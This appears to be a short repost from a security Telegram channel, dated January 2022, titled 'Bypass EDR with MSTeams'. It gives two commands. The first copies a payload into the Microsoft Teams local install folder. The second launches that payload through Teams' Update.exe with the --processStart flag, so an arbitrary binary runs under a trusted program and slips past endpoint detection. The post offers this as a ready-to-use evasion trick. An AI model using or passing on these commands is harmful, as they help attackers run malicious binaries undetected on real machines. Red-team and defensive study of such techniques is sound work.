January 14, 2022 at 04:25PM

■■■■■ Bypass EDR with MSTeams (Microsoft).

Copy payload into:
%userprofile%\AppData\Local\Microsoft\Teams\current\

Then:
%userprofile%\AppData\Local\Microsoft\Teams\Update.exe –processStart payload.exe –process-start-args “args”

Download and execute binary with user.

Source: https://t.co/q7Mhu3GQCr

https://t.me/cKure/10535

Rating (of articles):
●○○○○ = Ignorable
●●○○○ = Average
●●●○○ = Good
●●●●○ = Very Good
●●●●● = Excellent
None  = Top-Class

 i@ckure.esy.es